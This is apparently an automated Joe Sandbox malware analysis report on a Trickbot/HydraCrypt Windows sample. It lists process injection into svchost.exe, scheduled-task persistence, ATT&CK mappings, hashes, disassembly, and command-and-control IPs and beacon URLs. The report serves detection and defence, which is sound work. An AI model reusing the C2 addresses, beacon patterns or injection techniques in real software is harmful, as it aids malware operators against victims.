Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019138	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29C0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 159F29D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Memory written: C:\Windows\System32\svchost.exe base: 140019140	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs			Jump to behavior
Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe -k netsvcs			Jump to behavior

Source: C:\Windows\System32\svchost.exe

Code function: 6_2_00000001400182FC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_00000001400182FC

Stealing of Sensitive Information

Yara detected Trickbot

Source: Yara match	File source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

Remote Access Functionality

Yara detected Trickbot

Source: Yara match	File source: 00000008.00000002.2670443907.00000159F2A13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5496, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	411 Process Injection	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Software Packing	Security Account Manager	2 System Network Configuration Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	13 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
55ryoipjfdr.exe	90%	Virustotal		Browse
55ryoipjfdr.exe	95%	ReversingLabs	Win32.Ransomware.HydraCrypt
55ryoipjfdr.exe	100%	Avira	HEUR/AGEN.1315497
55ryoipjfdr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	100%	Avira	HEUR/AGEN.1315497
C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe	95%	ReversingLabs	Win32.Ransomware.HydraCrypt

Source	Detection	Scanner	Label
https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	0%	Avira URL Cloud	safe
https://194.87.95.122/	0%	Avira URL Cloud	safe
https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/u	0%	Avira URL Cloud	safe
https://194.87.95.122:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	0%	Avira URL Cloud	safe
https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	0%	Avira URL Cloud	safe
https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	0%	Avira URL Cloud	safe
https://194.87.99.210/	0%	Avira URL Cloud	safe
https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/H	0%	Avira URL Cloud	safe
https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/pD	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.12.205	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://194.87.95.122/	svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.95.122:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.99.210/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/u	svchost.exe, 00000008.00000002.2670682517.00000159F2A71000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	svchost.exe, 00000008.00000002.2671346385.00000159F3706000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/	svchost.exe, 00000008.00000002.2670748747.00000159F2A84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2671363412.00000159F3716000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.99.210/	svchost.exe, 00000008.00000002.2670888110.00000159F2AEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2670888110.00000159F2AFA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.95.122/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/H	svchost.exe, 00000008.00000002.2670835827.00000159F2AB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://194.87.99.210:443/mac1/530978_W10019045.DA5B53966FEFB74C898363C3EE618EB5/5/spk/pD	svchost.exe, 00000008.00000002.2670621225.00000159F2A57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
178.156.202.97	unknown	Romania	29119	SERVIHOSTING-ASAireNetworksES	true
194.87.99.62	unknown	Russian Federation	48347	MTW-ASRU	true
194.87.146.180	unknown	Russian Federation	48347	MTW-ASRU	true
194.87.111.6	unknown	Russian Federation	48347	MTW-ASRU	true
194.87.95.122	unknown	Russian Federation	48347	MTW-ASRU	true
147.135.196.128	unknown	France	16276	OVHFR	true
195.133.147.135	unknown	Russian Federation	48347	MTW-ASRU	true
195.133.197.187	unknown	Russian Federation	48347	MTW-ASRU	true
194.87.99.210	unknown	Russian Federation	48347	MTW-ASRU	true
185.15.245.102	unknown	Germany	24961	MYLOC-ASIPBackboneofmyLocmanagedITAGDE	true
185.15.245.103	unknown	Germany	24961	MYLOC-ASIPBackboneofmyLocmanagedITAGDE	true
194.87.95.120	unknown	Russian Federation	48347	MTW-ASRU	true
185.158.113.62	unknown	Russian Federation	44812	IPSERVER-RU-NETFiordRU	true
194.87.239.114	unknown	Russian Federation	48347	MTW-ASRU	true
195.133.48.80	unknown	Russian Federation	48347	MTW-ASRU	true
194.87.99.220	unknown	Russian Federation	48347	MTW-ASRU	true
169.239.129.42	unknown	Seychelles	61138	ZAPPIE-HOST-ASZappieHostGB	true
193.19.118.207	unknown	Russian Federation	44812	IPSERVER-RU-NETFiordRU	true
91.83.88.51	unknown	Hungary	12301	INVITECHHU	true
199.48.160.60	unknown	United States	19531	NODESDIRECTUS	true
94.242.224.218	unknown	Luxembourg	5577	ROOTLU	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592535
Start date and time:	2025-01-16 09:08:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	55ryoipjfdr.exe
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@8/4@1/22
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 82 Number of non-executed functions: 149
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
03:10:54	API Interceptor	1x Sleep call for process: svchost.exe modified
09:10:20	Task Scheduler	Run new task: services update path: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	RtU8kXPnKr.exe	Get hash	malicious	Quasar	Browse	api.ipify.org/
	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	http://com-evaluate-fanpage30127.pages.dev/help/contact/671203900952887	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	https://cancelartransferenciaprogramadabdb.glitch.me/	Get hash	malicious	Unknown	Browse	104.26.12.205
	009.vbe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://adelademable.org/abujguyaleon.html	Get hash	malicious	Unknown	Browse	104.26.12.205
	0969686.vbe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	NEW SHIPPING DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	new order.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://savory-sweet-felidae-psrnd.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	http://loginmicrosoftonline.al-mutaheda.com/expiration/notice/nRrRc/receiving@accel-inc.com	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	Employee_Salary_Update.docx	Get hash	malicious	Unknown	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	104.21.96.1
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	QT202515010642.JPG.PDF.vbs	Get hash	malicious	Unknown	Browse	104.17.151.117
	Personliche Nachricht fur Friedhelm Hanusch.pdf	Get hash	malicious	Unknown	Browse	104.18.94.41
	arm7.elf	Get hash	malicious	Unknown	Browse	1.12.192.222
	https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69	Get hash	malicious	Unknown	Browse	172.67.215.98
	https://crm1.ascentismedia.com/MatrixCRM2/CommunicationsCentre/publicpages/LinkTrackers.aspx?link=https%3A%2F%2Fdenionquil.glitch.me%23Y3VzdG9tZXJzZXJ2aWNlQGRpYXRyb24uY29t&blastid=HaJwKgulsuhThrevQ-bg1A==&cc=k7ybaJOHC1q7mw3Z9UVdFw==&linkid=n6XO784zESaOPkbEOEOx87g4IWcBarkC2D1Tdl8CJciDFYwgGprfRd-XvUJO4gpJ&MID=gbzhqmttgi2dknbxgyza&CNO=&isCXComm=1	Get hash	malicious	Unknown	Browse	104.21.63.154
	https://vyralink.emlnk.com/lt.php?x=3DZy~GE7IaWZ5XV7zAA9W.Zs~X7UvAL0v~hgXXLLJ3ag6X8v-Uy.xuG-142imNf#user_email=fiona.zhang@bbraun.com&fname=Zhang&lname=Fiona	Get hash	malicious	Unknown	Browse	104.17.25.14
SERVIHOSTING-ASAireNetworksES	elitebotnet.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	178.156.215.19
	4.elf	Get hash	malicious	Unknown	Browse	185.27.124.167
	mpsl.elf	Get hash	malicious	Mirai	Browse	89.44.65.127
	Fantazy.mpsl.elf	Get hash	malicious	Unknown	Browse	213.170.233.169
	armv7l.elf	Get hash	malicious	Mirai	Browse	5.83.49.109
	Hilix.ppc.elf	Get hash	malicious	Mirai	Browse	185.132.166.222
	Hilix.mpsl.elf	Get hash	malicious	Mirai	Browse	185.237.202.191
	Hilix.x86.elf	Get hash	malicious	Mirai	Browse	185.132.166.208
	nabm68k.elf	Get hash	malicious	Unknown	Browse	151.237.211.60
	splmpsl.elf	Get hash	malicious	Unknown	Browse	185.178.168.147
MTW-ASRU	botx.m68k.elf	Get hash	malicious	Mirai	Browse	195.133.157.170
	8N8j6QojHn.dll	Get hash	malicious	Unknown	Browse	195.133.1.117
	8N8j6QojHn.dll	Get hash	malicious	Unknown	Browse	195.133.1.117
	ET5.exe	Get hash	malicious	Unknown	Browse	45.141.101.45
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	193.124.107.252
	na.elf	Get hash	malicious	Unknown	Browse	193.124.64.114
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	193.124.64.126
	g082Q9DajU.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer	Browse	195.133.48.136
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	195.133.48.136
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	195.133.48.136

Process:	C:\Users\user\Desktop\55ryoipjfdr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396288
Entropy (8bit):	7.640880445990648
Encrypted:	false
SSDEEP:	6144:89FHululululululu4uOjzzUDjTgfH1okjroGWr2:89FHKKKKKKFzjzQJ5
MD5:	F0B9F50C6A247AC5CA9CC95135B83DCF
SHA1:	C1B276883DA10FA2BF1C37A3851781E5C702A601
SHA-256:	068AF8016C36FCE5CF1E1A4722C1DC0D6E02CB6ED58B61C2BA99A54D294CC274
SHA-512:	F02FCB14FFD9415281C4E2F916FB8A38E80BCD885A1EC6E07B73698C9878A8318E60092DA859818CDF49DE263F99F768684DA5ECEA669A9A2623A03A5D6DB1BB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.U.....................F...................@..........................@......h...........................................x....... ...............................................................................$............................text............................... ..`.rdata..l5.......6.................. ..@.data....y... ...z..................@....rsrc... ............v.................@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\55ryoipjfdr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\winapp\client_id

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	100
Entropy (8bit):	2.9436287058372557
Encrypted:	false
SSDEEP:	3:jlkvoOPPlllMH/KUnYR8H3TRlg4fn:jevoO10HLY61lgOn
MD5:	5490E48281541B751FBD683F84E39A7E
SHA1:	0BF2CC08C8411227DB415756ABB00E223CF151BB
SHA-256:	37191C2B65ED5E5C914C289CF8E7FF8330BD249F5E6B1A88DAD24F2348886D3C
SHA-512:	38CFA10E4880F601EBC52758DD656D3CE7B830463C6B1A8BE72E9C80D598EDAF358EE8F0C677C32E476517834643160E10634C207D588B0E40573B53E48DC490
Malicious:	false
Reputation:	low
Preview:	5.3.0.9.7.8._.W.1.0.0.1.9.0.4.5...D.A.5.B.5.3.9.6.6.F.E.F.B.7.4.C.8.9.8.3.6.3.C.3.E.E.6.1.8.E.B.5...

C:\Users\user\AppData\Roaming\winapp\group_tag

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	10
Entropy (8bit):	1.7709505944546688
Encrypted:	false
SSDEEP:	3:zl/:zl/
MD5:	9A878743FE56E3481D8D00A4DD43D2CB
SHA1:	E52D81B1838C735F0563ED631EDB19E95F542679
SHA-256:	B4B7C9157A3698AF44CF82CCB87D2A2BE658B18BE04B8051611144A908857927
SHA-512:	D4863D6C23D404B9C493EF75D8ED0B31969EC6BD24EDD377BA93F9AA2B30AE498B1BBDFDA3B41C2BCDC7238F7FA23CBBF9A4F29A4E4948A85D128EC9988249C2
Malicious:	false
Reputation:	low
Preview:	m.a.c.1...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.640880445990648
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	55ryoipjfdr.exe
File size:	396'288 bytes
MD5:	f0b9f50c6a247ac5ca9cc95135b83dcf
SHA1:	c1b276883da10fa2bf1c37a3851781e5c702a601
SHA256:	068af8016c36fce5cf1e1a4722c1dc0d6e02cb6ed58b61c2ba99a54d294cc274
SHA512:	f02fcb14ffd9415281c4e2f916fb8a38e80bcd885a1ec6e07b73698c9878a8318e60092da859818cdf49de263f99f768684da5ecea669a9a2623a03a5d6db1bb
SSDEEP:	6144:89FHululululululu4uOjzzUDjTgfH1okjroGWr2:89FHKKKKKKFzjzQJ5
TLSH:	4F84D76A700ACB90DFC8D0FB2CD395F33A642363949B8E9C561D5F95BAE0DFC9960244
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.U.....................F....................@..........................@......h......................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40a8d7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x55114F00 [Tue Mar 24 11:48:16 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	e24946fd3b548d18411ea3dc85666a69

Entrypoint Preview

Instruction
push ebp
push esp
pop ebp
lea esp, dword ptr [ebp-2Ch]
lea ecx, dword ptr [00000049h]
lea eax, dword ptr [00000008h]
inc eax
push eax
push 0041297Dh
push 0041296Bh
call dword ptr [0040C808h]
push 00412986h
lea eax, dword ptr [FFFFFFFFh]
inc eax
push eax
lea eax, dword ptr [000FFFFFh]
inc eax
push eax
call dword ptr [0040C7D8h]
test eax, eax
jne 00007F80593139BFh
push 00412986h
lea eax, dword ptr [FFFFFFFFh]
inc eax
push eax
lea eax, dword ptr [000FFFFFh]
inc eax
push eax
call dword ptr [0040C7D8h]
cmp eax, 00000000h
jne 00007F805931399Bh
lea eax, dword ptr [00000008h]
inc eax
push eax
push 0041297Dh
push 0041296Bh
call dword ptr [0040C808h]
push 00412986h
lea eax, dword ptr [FFFFFFFFh]
inc eax
push eax
lea eax, dword ptr [000FFFFFh]
inc eax
push eax
call dword ptr [0040C7D8h]
cmp eax, 00000000h
jne 00007F805931395Fh
push 0040738Fh
ret
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
lea eax, dword ptr [00000008h]
inc eax
push eax
push 0041297Dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe000	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x49520	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf6d0	0x1e9c	.rdata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1204	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc71c	0x124	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc0c8	0xc200	652b75188d378644e33c0f240ba7cdd0	False	0.14410840850515463	data	4.639698222820729	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x356c	0x3600	5887208e6d7eee01aed0c9730c63b618	False	0.5432581018518519	data	5.543532077797315	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x12000	0x798f	0x7a00	18c3ed8d7ca1a47b64c23553968c7c51	False	0.1443391393442623	data	7.640824225225697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x49520	0x49600	1e9722598152d22e71d517b382fa6c49	False	0.8315521188245315	data	7.813923857717711	IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1a120	0x3d200	data	English	United States	0.9962215618609407
RT_DIALOG	0x57320	0x4000	data	English	United States	0.00738525390625
RT_DIALOG	0x5b320	0x4000	data	English	United States	0.00738525390625
RT_DIALOG	0x5f320	0x4000	data	English	United States	0.00738525390625
RT_DIALOG	0x63320	0x200	data	English	United States	0.12109375

Imports

DLL	Import
advapi32.dll	RegEnumKeyW, OpenEventLogW, ClearEventLogA, LogonUserW, InitializeAcl, CryptSignHashW, RegOpenKeyA, ControlService, RegReplaceKeyA, RegSaveKeyA, RegCreateKeyExA, RegUnLoadKeyA
authz.dll	AuthzAddSidsToContext, AuthzInitializeContextFromSid
shlwapi.dll	UrlIsNoHistoryW, PathIsRootW, UrlGetLocationW, UrlCombineW, PathCommonPrefixA, UrlIsOpaqueW, PathCompactPathW, PathAppendA, PathCombineA, UrlCompareW, PathIsURLW, UrlIsA, UrlHashW, UrlGetPartW
wtsapi32.dll	WTSFreeMemory, WTSSetSessionInformationW, WTSVirtualChannelRead, WTSWaitSystemEvent, WTSRegisterSessionNotification, WTSQueryUserToken, WTSVirtualChannelPurgeInput, WTSQuerySessionInformationA, WTSSetUserConfigW, WTSEnumerateSessionsW, WTSEnumerateServersA
kernel32.dll	WaitForSingleObject, CreateJobObjectW, GetProcAddress, GetStringTypeW, OpenJobObjectW, InitializeCriticalSection, GetCommandLineW, MoveFileA, GetModuleHandleA, GetTempPathA, ReadConsoleA, GetProfileSectionA, GetSystemDirectoryA, CreateMailslotA, CreateFileW, GetLogicalDriveStringsA, GetModuleFileNameW, UnmapViewOfFile, GetDateFormatA, GetVersion, LoadLibraryExA, GetExpandedNameA, lstrcmpiA, DeleteFileW, SearchPathW, GetTickCount, GetFileAttributesW, MoveFileExA, GetConsoleAliasA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T09:10:55.439247+0100	2838349	ETPRO MALWARE Win32/TrickBot CnC Initial Checkin	1	192.168.2.8	49713	194.87.99.210	443	TCP
2025-01-16T09:10:56.730422+0100	2838349	ETPRO MALWARE Win32/TrickBot CnC Initial Checkin	1	192.168.2.8	49714	194.87.99.210	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 09:10:53.645608902 CET	49712	80	192.168.2.8	104.26.12.205
Jan 16, 2025 09:10:53.650430918 CET	80	49712	104.26.12.205	192.168.2.8
Jan 16, 2025 09:10:53.650510073 CET	49712	80	192.168.2.8	104.26.12.205
Jan 16, 2025 09:10:53.650801897 CET	49712	80	192.168.2.8	104.26.12.205
Jan 16, 2025 09:10:53.655590057 CET	80	49712	104.26.12.205	192.168.2.8
Jan 16, 2025 09:10:54.159845114 CET	80	49712	104.26.12.205	192.168.2.8
Jan 16, 2025 09:10:54.209256887 CET	49712	80	192.168.2.8	104.26.12.205
Jan 16, 2025 09:10:54.265755892 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:54.265813112 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:54.266088963 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:54.267465115 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:54.267484903 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.102375031 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.102447987 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.106292963 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.106322050 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.106549025 CET	443	49713	194.87.99.210	192.168.2.8
Jan 16, 2025 09:10:55.136301994 CET	49713	443	192.168.2.8	194.87.99.210
Jan 16, 2025 09:10:55.179358959 CET	443	49713	194.87.99.210	192.168.2.8
